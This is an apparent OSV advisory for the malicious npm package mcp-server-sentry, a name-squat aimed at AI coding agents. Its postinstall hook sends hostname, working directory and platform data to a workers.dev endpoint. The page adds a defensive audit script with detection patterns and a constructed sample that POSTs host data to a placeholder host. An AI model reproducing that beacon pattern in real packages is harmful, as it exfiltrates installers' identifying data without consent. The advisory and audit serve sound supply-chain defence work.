MAL-2026-5483

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/mcp-server-sentry/MAL-2026-5483.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-5483
Published
2026-06-09T20:33:56Z
Modified
2026-06-09T21:01:35.465142301Z
Summary
Malicious code in mcp-server-sentry (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (cf12283b2f16a43388d0cc6c2991fbbdab0da44ab344c1f9c71515dd05024046)

On npm install, the package's postinstall hook (scripts.postinstall: node index.js) collects host identifiers — os.hostname(), process.cwd(), the npm user-agent, Node version, and os.platform()/arch — and POSTs them to a hardcoded remote endpoint at https://npx-canary-log.vulnerable-live.workers.dev/log without any installer consent or opt-out. The package name mcp-server-sentry is an unscoped squat targeting the MCP/Sentry naming convention used by AI coding agents and developer tooling that invoke npx mcp-server-sentry expecting an official MCP server; the README confirms the package was published to capture traffic resolving this unclaimed name. The combination of an intentional name-squat plus install-time outbound transmission of installer identifiers (hostname + working-directory paths, which routinely leak usernames and project layouts) to an author-controlled Cloudflare Workers endpoint is a supply-chain exfiltration shape, regardless of the author's stated 'research canary' intent — installers receive no disclosure and no opportunity to decline before the beacon fires.
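The behaviour described above is detectable before a package ever runs: the beacon lives in an install-time lifecycle hook, and the script it launches combines host-identifier reads with an outbound request. The following is an added example of a small pre-install audit written for this page; it is not code from the OSV record, from amazon-inspector, or from the mcp-server-sentry package. The manifest and the `index.js` text it inspects are constructed stand-ins (the endpoint `example.invalid` is a placeholder), and the function names `findInstallHooks`, `scriptTarget`, `findRiskyApis` and `auditPackage` are this example's own.

```javascript
// Added example, not part of the OSV record: audit a package manifest for
// install-time lifecycle hooks and scan the script they launch for the
// host-fingerprinting and network APIs named in the advisory.

// npm lifecycle scripts that run during `npm install` without a user action.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Patterns a reviewer wants surfaced: host identifiers plus outbound calls.
const RISKY_APIS = [
  { name: 'os.hostname', re: /\bos\.hostname\s*\(/ },
  { name: 'process.cwd', re: /\bprocess\.cwd\s*\(/ },
  { name: 'os.platform/arch', re: /\bos\.(platform|arch)\s*\(/ },
  { name: 'npm_config_user_agent', re: /npm_config_user_agent/ },
  { name: 'http(s).request', re: /\bhttps?\.request\s*\(/ },
  { name: 'fetch', re: /\bfetch\s*\(/ },
  { name: 'workers.dev URL', re: /https?:\/\/[^\s'"`]*workers\.dev/ },
];

// Lifecycle hooks in a package.json object that execute at install time.
function findInstallHooks(pkg) {
  const scripts = (pkg && pkg.scripts) || {};
  return INSTALL_HOOKS.filter((h) => typeof scripts[h] === 'string')
    .map((h) => ({ hook: h, command: scripts[h] }));
}

// Best-effort guess of the file a hook command runs ("node index.js" -> "index.js").
function scriptTarget(command) {
  const m = command.match(/\bnode\s+(?:--[\w-]+\s+)*([\w./-]+\.[cm]?js)\b/);
  return m ? m[1] : null;
}

// Names of risky APIs present in a source string.
function findRiskyApis(source) {
  return RISKY_APIS.filter((p) => p.re.test(source)).map((p) => p.name);
}

// files: map of path -> contents, as extracted from the package tarball.
// Returns one finding per install-time hook with a coarse verdict.
function auditPackage(pkg, files) {
  const findings = [];
  for (const { hook, command } of findInstallHooks(pkg)) {
    const target = scriptTarget(command);
    const source = target && files[target] !== undefined ? files[target] : '';
    const apis = findRiskyApis(source);
    const hasNetwork = apis.some((a) => /request|fetch|workers\.dev/.test(a));
    const hasHostId = apis.some((a) => /hostname|cwd|platform|user_agent/.test(a));
    let verdict = 'review';            // hook exists; inspect by hand
    if (hasNetwork) verdict = 'network at install';
    if (hasNetwork && hasHostId) verdict = 'install-time beacon'; // the shape in the advisory
    findings.push({ hook, command, target, apis, verdict });
  }
  return findings;
}

// CONSTRUCTED sample input: a manifest with a postinstall hook and a script
// that reads host identifiers and POSTs them. Not the real package contents.
const SAMPLE_PKG = {
  name: 'example-squat',
  version: '0.0.1',
  scripts: { postinstall: 'node index.js', test: 'node test.js' },
};
const SAMPLE_FILES = {
  'index.js': [
    "const os = require('os');",
    'const payload = { host: os.hostname(), cwd: process.cwd(), plat: os.platform() };',
    "fetch('https://example.invalid/log', { method: 'POST', body: JSON.stringify(payload) });",
  ].join('\n'),
};

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(auditPackage(SAMPLE_PKG, SAMPLE_FILES), null, 2));
}
```

A check like this belongs in a CI gate or a pre-install review step; the blunt mitigation for the whole class is to run `npm install --ignore-scripts` (or set `ignore-scripts=true` in `.npmrc`) so lifecycle hooks never execute on developer machines and agents, and to enable them only for packages that have been reviewed.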

Database specific
{
    "malicious-packages-origins": [
        {
            "import_time": "2026-06-09T20:45:56.271164213Z",
            "versions": [
                "0.0.1"
            ],
            "sha256": "8958cba33d604713291f4f6c0a036afbf1e87ad5a4f07208e65b8b6c0c8925cd",
            "id": "IN-MAL-2026-005222",
            "source": "amazon-inspector",
            "modified_time": "2026-06-09T20:33:56Z"
        },
        {
            "import_time": "2026-06-09T20:45:56.113242468Z",
            "versions": [
                "0.0.1"
            ],
            "sha256": "cf12283b2f16a43388d0cc6c2991fbbdab0da44ab344c1f9c71515dd05024046",
            "id": "IN-MAL-2026-005221",
            "source": "amazon-inspector",
            "modified_time": "2026-06-09T20:33:56Z"
        }
    ]
}
References
Credits

Affected packages

Package: npm / mcp-server-sentry
Affected ranges: 0.*
Affected versions: 0.0.1

Database specific

indicators
{
    "domains": [
        "npx-canary-log.vulnerable-live.workers.dev"
    ],
    "evidence_files": [
        {
            "sha256": "36cd93aa9a8ac8a0b6d64e4ef03aa5c3efd6d9f6f0b7434392475f8a2fed6877",
            "tlsh": "f33195e180f805351bee46d3e1e9a899a36ff1263a0678f4b45e02295fcd49807b1cd2",
            "path": "index.js"
        },
        {
            "sha256": "c276523e95d9666c73752d3ec82def504a1429a6909eec82daa1b1927e464c84",
            "tlsh": "9021717393d1733a03d24a363944b6626b3e70b5734210a8f69d060eeb4282a83b30d6",
            "path": "README.md"
        }
    ],
    "package_integrity": [
        {
            "filename": "mcp-server-sentry-0.0.1.tgz",
            "hashes": {
                "sha512_sri": "sha512-2lKbHqncUy77jU2CDqWm5GhYi+/KNDO/DlFcE14v6nRPKbfV+oKXd9NTGIoZqsERKNrVhn3+D6ZBmBMas1s6Jg==",
                "sha1": "bb35a4f090eb1ef8833d9a90bafefeec099dd6b3"
            }
        }
    ]
}
cwes
[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/mcp-server-sentry/MAL-2026-5483.json"